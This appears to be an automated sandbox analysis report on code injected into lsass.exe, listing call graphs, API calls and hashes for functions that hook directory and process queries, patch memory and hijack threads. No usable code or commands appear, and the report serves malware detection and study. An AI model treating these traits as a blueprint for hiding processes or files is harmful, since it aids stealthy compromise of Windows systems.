7730->7734 7731->7730 7732->7730 7733->7730 7734->7730 7989 202c0aeb590 7996 202c0aed650 7989->7996 7997 202c0aed3ec try_get_function 5 API calls 7996->7997 7998 202c0aed678 TlsAlloc 7997->7998 8170 202c0ae6110 8171 202c0ae611d 8170->8171 8172 202c0ae6129 8171->8172 8179 202c0ae623a 8171->8179 8173 202c0ae61ad 8172->8173 8174 202c0ae6186 SetThreadContext 8172->8174 8174->8173 8175 202c0ae6261 VirtualProtect FlushInstructionCache 8175->8179 8176 202c0ae633e 8178 202c0ae5210 3 API calls 8176->8178 8177 202c0ae631e 8177->8176 8180 202c0ae4800 VirtualFree 8177->8180 8183 202c0ae6343 8178->8183 8179->8175 8179->8177 8180->8176 8181 202c0ae6397 8184 202c0ae7d60 _handle_error 8 API calls 8181->8184 8182 202c0ae6357 ResumeThread 8182->8183 8183->8181 8183->8182 8185 202c0ae63df 8184->8185 8000 202c0aeeb90 8001 202c0aeebbd 8000->8001 8002 202c0aeb960 _set_errno_from_matherr 13 API calls 8001->8002 8007 202c0aeebd2 8001->8007 8003 202c0aeebc7 8002->8003 8005 202c0aeb840 _invalid_parameter_noinfo 30 API calls 8003->8005 8004 202c0ae7d60 _handle_error 8 API calls 8006 202c0aeef1f 8004->8006 8005->8007 8007->8004 8186 202c0aee710 8189 202c0aee694 8186->8189 8196 202c0aeaebc EnterCriticalSection 8189->8196 7636 202c0aea688 7637 202c0aea6a1 7636->7637 7638 202c0aea69d 7636->7638 7639 202c0aecd58 43 API calls 7637->7639 7640 202c0aea6a6 7639->7640 7648 202c0aed250 GetEnvironmentStringsW 7640->7648 7643 202c0aea6b3 7646 202c0aeb9f8 __free_lconv_num 13 API calls 7643->7646 7646->7638 7647 202c0aeb9f8 __free_lconv_num 13 API calls 7647->7643 7649 202c0aed27e 7648->7649 7659 202c0aed320 7648->7659 7652 202c0aed1a0 WideCharToMultiByte 7649->7652 7650 202c0aed32a FreeEnvironmentStringsW 7651 202c0aea6ab 7650->7651 7651->7643 7660 202c0aea6f4 7651->7660 7653 202c0aed2d0 7652->7653 7654 202c0aeaf2c 14 API calls 7653->7654 7653->7659 7655 202c0aed2df 7654->7655 7656 202c0aed309 7655->7656 7657 202c0aed1a0 WideCharToMultiByte 7655->7657 7658 202c0aeb9f8 __free_lconv_num 13 API calls 7656->7658 7657->7656 7658->7659 7659->7650 7659->7651 7661 202c0aea71b 7660->7661 7662 202c0aeb980 _set_errno_from_matherr 13 API calls 7661->7662 7669 202c0aea750 7662->7669 7663 202c0aeb9f8 __free_lconv_num 13 API calls 7664 202c0aea6c0 7663->7664 7664->7647 7665 202c0aeb980 _set_errno_from_matherr 13 API calls 7665->7669 7666 202c0aea7b0 7668 202c0aea7fc 13 API calls 7666->7668 7670 202c0aea7b8 7668->7670 7669->7665 7669->7666 7671 202c0aea7e7 7669->7671 7673 202c0aea7bf 7669->7673 7675 202c0aeb9f8 __free_lconv_num 13 API calls 7669->7675 7677 202c0aeac54 7669->7677 7672 202c0aeb9f8 __free_lconv_num 13 API calls 7670->7672 7674 202c0aeb860 _invalid_parameter_noinfo 17 API calls 7671->7674 7672->7673 7673->7663 7676 202c0aea7f9 7674->7676 7675->7669 7678 202c0aeac61 7677->7678 7679 202c0aeac6b 7677->7679 7678->7679 7684 202c0aeac86 7678->7684 7680 202c0aeb960 _set_errno_from_matherr 13 API calls 7679->7680 7681 202c0aeac72 7680->7681 7682 202c0aeb840 _invalid_parameter_noinfo 30 API calls 7681->7682 7683 202c0aeac7e 7682->7683 7683->7669 7684->7683 7685 202c0aeb960 _set_errno_from_matherr 13 API calls 7684->7685 7685->7681 7735 202c0ae2408 7736 202c0ae2484 _invalid_parameter_noinfo 7735->7736 7737 202c0ae24ea GetFileType 7736->7737 7744 202c0ae25c3 7736->7744 7738 202c0ae250c 7737->7738 7739 202c0ae24f8 StrCpyW 7737->7739 7740 202c0ae19d8 4 API calls 7738->7740 7742 202c0ae2519 7739->7742 7740->7742 7741 202c0ae3c70 StrCmpNIW 7741->7742 7742->7741 7743 202c0ae330c 4 API calls 7742->7743 7742->7744 7745 202c0ae1cd4 2 API calls 7742->7745 7743->7742 7745->7742 7746 202c0aee408 7747 202c0aee413 7746->7747 7755 202c0af0c64 7747->7755 7768 202c0aeaebc EnterCriticalSection 7755->7768 8017 202c0aeb184 8018 202c0aeb189 8017->8018 8022 202c0aeb19e 8017->8022 8023 202c0aeb1a4 8018->8023 8024 202c0aeb1e6 8023->8024 8025 202c0aeb1ee 8023->8025 8026 202c0aeb9f8 __free_lconv_num 13 API calls 8024->8026 8027 202c0aeb9f8 __free_lconv_num 13 API calls 8025->8027 8026->8025 8028 202c0aeb1fb 8027->8028 8029 202c0aeb9f8 __free_lconv_num 13 API calls 8028->8029 8030 202c0aeb208 8029->8030 8031 202c0aeb9f8 __free_lconv_num 13 API calls 8030->8031 8032 202c0aeb215 8031->8032 8033 202c0aeb9f8 __free_lconv_num 13 API calls 8032->8033 8034 202c0aeb222 8033->8034 8035 202c0aeb9f8 __free_lconv_num 13 API calls 8034->8035 8036 202c0aeb22f 8035->8036 8037 202c0aeb9f8 __free_lconv_num 13 API calls 8036->8037 8038 202c0aeb23c 8037->8038 8039 202c0aeb9f8 __free_lconv_num 13 API calls 8038->8039 8040 202c0aeb249 8039->8040 8041 202c0aeb9f8 __free_lconv_num 13 API calls 8040->8041 8042 202c0aeb259 8041->8042 8043 202c0aeb9f8 __free_lconv_num 13 API calls 8042->8043 8044 202c0aeb269 8043->8044 8049 202c0aeb054 8044->8049 8063 202c0aeaebc EnterCriticalSection 8049->8063 8197 202c0aeab04 8198 202c0aeab35 8197->8198 8199 202c0aeab1d 8197->8199 8199->8198 8200 202c0aeb9f8 __free_lconv_num 13 API calls 8199->8200 8200->8198 7769 202c0aef004 7770 202c0aef023 7769->7770 7771 202c0aef09c 7770->7771 7774 202c0aef033 7770->7774 7777 202c0ae8620 7771->7777 7775 202c0ae7d60 _handle_error 8 API calls 7774->7775 7776 202c0aef092 7775->7776 7780 202c0ae8634 IsProcessorFeaturePresent 7777->7780 7781 202c0ae864b 7780->7781 7786 202c0ae86d0 RtlCaptureContext RtlLookupFunctionEntry 7781->7786 7787 202c0ae8700 RtlVirtualUnwind 7786->7787 7788 202c0ae865f 7786->7788 7787->7788 7789 202c0ae8518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7788->7789 8065 202c0aed984 GetProcessHeap 8066 202c0ae2fa0 8067 202c0ae2fc7 8066->8067 8068 202c0ae3094 8067->8068 8069 202c0ae2fe4 PdhGetCounterInfoW 8067->8069 8069->8068 8070 202c0ae3006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8069->8070 8071 202c0ae3080 GetProcessHeap HeapFree 8070->8071 8072 202c0ae3038 StrCmpW 8070->8072 8071->8068 8072->8071 8074 202c0ae304d 8072->8074 8073 202c0ae3558 12 API calls 8073->8074 8074->8071 8074->8073 7686 202c0af1ca0 7687 202c0af1cb1 CloseHandle 7686->7687 7688 202c0af1cb7 7686->7688 7687->7688 8201 202c0aed11c GetCommandLineA GetCommandLineW 6639 202c0ae2618 NtQueryDirectoryFileEx 6640 202c0ae26a7 _invalid_parameter_noinfo 6639->6640 6651 202c0ae288f 6639->6651 6641 202c0ae26fe GetFileType 6640->6641 6640->6651 6642 202c0ae270c StrCpyW 6641->6642 6643 202c0ae2722 6641->6643 6645 202c0ae2731 6642->6645 6655 202c0ae19d8 GetFinalPathNameByHandleW 6643->6655 6648 202c0ae273b 6645->6648 6650 202c0ae27e0 6645->6650 6647 202c0ae3c70 StrCmpNIW 6647->6650 6648->6651 6660 202c0ae3c70 6648->6660 6663 202c0ae330c StrCmpIW 6648->6663 6667 202c0ae1cd4 6648->6667 6650->6647 6650->6651 6653 202c0ae330c 4 API calls 6650->6653 6654 202c0ae1cd4 2 API calls 6650->6654 6653->6650 6654->6650 6656 202c0ae1a41 6655->6656 6657 202c0ae1a02 StrCmpNIW 6655->6657 6656->6645 6657->6656 6658 202c0ae1a1c lstrlenW 6657->6658 6658->6656 6659 202c0ae1a2e StrCpyW 6658->6659 6659->6656 6661 202c0ae3c7d StrCmpNIW 6660->6661 6662 202c0ae3c92 6660->6662 6661->6662 6662->6648 6664 202c0ae333e StrCpyW StrCatW 6663->6664 6665 202c0ae3355 PathCombineW 6663->6665 6666 202c0ae335e 6664->6666 6665->6666 6666->6648 6668 202c0ae1cf4 6667->6668 6669 202c0ae1ceb 6667->6669 6668->6648 6671 202c0ae152c 6669->6671 6672 202c0ae157c 6671->6672 6673 202c0ae1546 6671->6673 6672->6668 6673->6672 6674 202c0ae155d StrCmpIW 6673->6674 6675 202c0ae1565 StrCmpW 6673->6675 6674->6673 6675->6673 6776 202c0ae2118 NtQuerySystemInformation 6777 202c0ae2154 6776->6777 6778 202c0ae226e 6777->6778 6785 202c0ae216c 6777->6785 6789 202c0ae2239 6777->6789 6779 202c0ae22e8 6778->6779 6780 202c0ae2279 6778->6780 6782 202c0ae22ed 6779->6782 6779->6789 6796 202c0ae31c0 GetProcessHeap HeapAlloc 6780->6796 6783 202c0ae31c0 11 API calls 6782->6783 6786 202c0ae2291 6783->6786 6784 202c0ae21b4 StrCmpNIW 6784->6785 6785->6784 6787 202c0ae21db 6785->6787 6785->6789 6786->6786 6786->6789 6787->6785 6790 202c0ae1c28 6787->6790 6791 202c0ae1c5a GetProcessHeap HeapAlloc 6790->6791 6792 202c0ae1cb4 6790->6792 6791->6792 6793 202c0ae1c92 6791->6793 6792->6787 6802 202c0ae1bf4 6793->6802 6801 202c0ae3213 6796->6801 6797 202c0ae32dd GetProcessHeap HeapFree 6797->6786 6798 202c0ae32d8 6798->6797 6799 202c0ae326a StrCmpNIW 6799->6801 6800 202c0ae1c28 6 API calls 6800->6801 6801->6797 6801->6798 6801->6799 6801->6800 6803 202c0ae1c0b 6802->6803 6805 202c0ae1c14 GetProcessHeap HeapFree 6802->6805 6804 202c0ae152c 2 API calls 6803->6804 6804->6805 6805->6792

                                                        Executed Functions

                                                        Function 00000202C0AE2618 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 187filenativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 202c0ae2618-202c0ae26a1 NtQueryDirectoryFileEx 6 202c0ae26a7-202c0ae26aa 5->6 7 202c0ae28c3-202c0ae28e5 5->7 6->7 8 202c0ae26b0-202c0ae26be 6->8 8->7 9 202c0ae26c4-202c0ae270a call 202c0ae9080 * 3 GetFileType 8->9 16 202c0ae270c-202c0ae2720 StrCpyW 9->16 17 202c0ae2722-202c0ae272c call 202c0ae19d8 9->17 19 202c0ae2731-202c0ae2735 16->19 17->19 20 202c0ae27e0-202c0ae27e5 19->20 21 202c0ae273b-202c0ae2754 call 202c0ae3370 call 202c0ae3c70 19->21 22 202c0ae27e8-202c0ae27ed 20->22 34 202c0ae278b-202c0ae27d5 21->34 35 202c0ae2756-202c0ae2785 call 202c0ae3370 call 202c0ae330c call 202c0ae1cd4 21->35 24 202c0ae27ef-202c0ae27f2 22->24 25 202c0ae280b 22->25 24->25 27 202c0ae27f4-202c0ae27f7 24->27 29 202c0ae280e-202c0ae2827 call 202c0ae3370 call 202c0ae3c70 25->29 27->25 30 202c0ae27f9-202c0ae27fc 27->30 45 202c0ae2829-202c0ae2858 call 202c0ae3370 call 202c0ae330c call 202c0ae1cd4 29->45 46 202c0ae2865-202c0ae2868 29->46 30->25 33 202c0ae27fe-202c0ae2801 30->33 33->25 37 202c0ae2803-202c0ae2809 33->37 34->7 43 202c0ae27db 34->43 35->7 35->34 37->25 37->29 43->21 45->46 69 202c0ae285a-202c0ae2863 45->69 48 202c0ae2891-202c0ae2894 46->48 49 202c0ae286a-202c0ae2884 46->49 53 202c0ae289d-202c0ae28a0 48->53 54 202c0ae2896-202c0ae289b 48->54 52 202c0ae2886-202c0ae2889 49->52 52->22 57 202c0ae288f 52->57 59 202c0ae28bb 53->59 60 202c0ae28a2-202c0ae28a5 53->60 54->7 62 202c0ae28bf 57->62 59->62 60->59 63 202c0ae28a7-202c0ae28aa 60->63 62->7 63->59 64 202c0ae28ac-202c0ae28af 63->64 64->59 66 202c0ae28b1-202c0ae28b4 64->66 66->59 68 202c0ae28b6-202c0ae28b9 66->68 68->59 68->62 69->52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: File$DirectoryQueryType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 4175507832-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: 4bb1ee494e169a9bb0dd39553ae720c44ae61645b0d4f36c04ca549f0c7bbb34
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 2E71A0322047C1C6F768DF26989C7EE67A1F389784F460017DF9A57B9ADE34C6298700
                                                        Function 00000202C0AE2118 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 70 202c0ae2118-202c0ae2152 NtQuerySystemInformation 71 202c0ae215b-202c0ae215d 70->71 72 202c0ae2154-202c0ae2158 70->72 73 202c0ae2323-202c0ae2343 71->73 74 202c0ae2163-202c0ae2166 71->74 72->71 75 202c0ae226e-202c0ae2277 74->75 76 202c0ae216c-202c0ae217e 74->76 77 202c0ae22e8-202c0ae22eb 75->77 78 202c0ae2279-202c0ae2293 call 202c0ae31c0 75->78 76->73 79 202c0ae2184 76->79 77->73 82 202c0ae22ed-202c0ae2300 call 202c0ae31c0 77->82 78->73 87 202c0ae2299-202c0ae22af 78->87 81 202c0ae218a-202c0ae21a0 79->81 84 202c0ae21ce-202c0ae21d9 call 202c0ae1bbc 81->84 85 202c0ae21a2-202c0ae21b2 81->85 82->73 94 202c0ae2302-202c0ae230a 82->94 92 202c0ae21fa-202c0ae220c 84->92 98 202c0ae21db-202c0ae21f3 call 202c0ae1c28 84->98 85->84 88 202c0ae21b4-202c0ae21cc StrCmpNIW 85->88 87->73 91 202c0ae22b1-202c0ae22cd 87->91 88->84 88->92 97 202c0ae22d1-202c0ae22e4 91->97 95 202c0ae220e-202c0ae2210 92->95 96 202c0ae221c-202c0ae221e 92->96 94->73 99 202c0ae230c-202c0ae2314 94->99 102 202c0ae2217-202c0ae221a 95->102 103 202c0ae2212-202c0ae2215 95->103 104 202c0ae2220-202c0ae2223 96->104 105 202c0ae2225 96->105 97->97 106 202c0ae22e6 97->106 98->92 109 202c0ae21f5-202c0ae21f8 98->109 101 202c0ae2317-202c0ae2321 99->101 101->73 101->101 108 202c0ae2228-202c0ae222b 102->108 103->108 104->108 105->108 106->73 110 202c0ae222d-202c0ae2233 108->110 111 202c0ae2239-202c0ae223c 108->111 109->108 110->81 110->111 111->73 112 202c0ae2242-202c0ae2246 111->112 113 202c0ae225d-202c0ae2269 112->113 114 202c0ae2248-202c0ae224b 112->114 113->73 114->73 115 202c0ae2251-202c0ae2256 114->115 115->112 116 202c0ae2258 115->116 116->73
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                        • String ID: Dead$S
                                                        • API String ID: 722747020-3138847638
                                                        • Opcode ID: 3ae11d13c672a2c15ef8f2c2abe976a7c24bc9e535a720ae25352bb0aded48b2
                                                        • Instruction ID: bd51ac949b3103490d5ac84b31713adab3a029a4bdcd659ccb33b0369cfc2db0
                                                        • Opcode Fuzzy Hash: 3ae11d13c672a2c15ef8f2c2abe976a7c24bc9e535a720ae25352bb0aded48b2
                                                        • Instruction Fuzzy Hash: E251BF33B107A1C6F761CB69988C7AC63A4F704784F469513DFA527B86EB38C969C740
                                                        Function 00000202C0AE19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 28a3fedeb60f698bc809e0eb2bb0f963b496928ff1c4be17e8e8c6bc82d8a7ae
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: FEF01963308781D2FB208B25E8DC3AD6260F754BC8F858023DB894695ADE7DC68DCB00
                                                        Function 00000202C0AE3618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3631
                                                        • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3640
                                                          • Part of subcall function 00000202C0AE3C70: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE255A), ref: 00000202C0AE3C88
                                                          • Part of subcall function 00000202C0AE3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3BC6
                                                          • Part of subcall function 00000202C0AE3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3BF4
                                                          • Part of subcall function 00000202C0AE3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C16
                                                          • Part of subcall function 00000202C0AE3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C34
                                                          • Part of subcall function 00000202C0AE3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3657), ref: 00000202C0AE3C55
                                                        • CreateThread.KERNELBASE ref: 00000202C0AE3687
                                                          • Part of subcall function 00000202C0AE1D3C: GetCurrentThread.KERNEL32 ref: 00000202C0AE1D47
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: 5e00b56a5011f95b9be4416941bb4109cd76edf14fefd3763ee878413cd918bf
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 9F119E33618780E1FB60A730A9CD36F2291BB94344F934527ABA6827D3DF7DC02C8600
                                                        Function 00000202C0AB2AB8 Relevance: 1.7, APIs: 1, Instructions: 241libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000003.1777918856.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_3_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 129f6654ddf291bfcc02ac597e6e4ba9e63da4c3abc93b6d9266984448174bff
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0D910172701390C7FB648F25D08CB6DB7A1F754B98F5681279F4A4778ADA38D84AC704
                                                        Function 00000202C0AE1AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                          • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                        • SleepEx.KERNELBASE ref: 00000202C0AE1AE3
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                          • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                          • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 48f1c9c4e08f8f8a17963c7a05af4dcbaeeea74d55b41f846ca028ac2f06a7b7
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 5821E0722007A1C1FB509B27D9CD36D53A8AB88FC1F0654239FAE87697FE24C879C210

                                                        Non-executed Functions

                                                        Function 00000202C0AE81B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2994216547.00000202C0B05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_12_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: 655669d659bb77ae1f59cd8b2a5acccc7e65959268475b5718497181645eae96
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 37314673205B80CAFB649F60E8983EE6364F798744F45412BDB9E47A9ADF38C648C704
                                                        Function 00000202C0AEB62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.2992617374.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        • Associated: 0000000C.00000002.2992103625.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993271974.00000202C0AF3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993645622.00000202C0AFD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000C.00000002.2993920927.00000202C0AFF000.00000002.00000001.00020000.00000000.sdmpDownload File
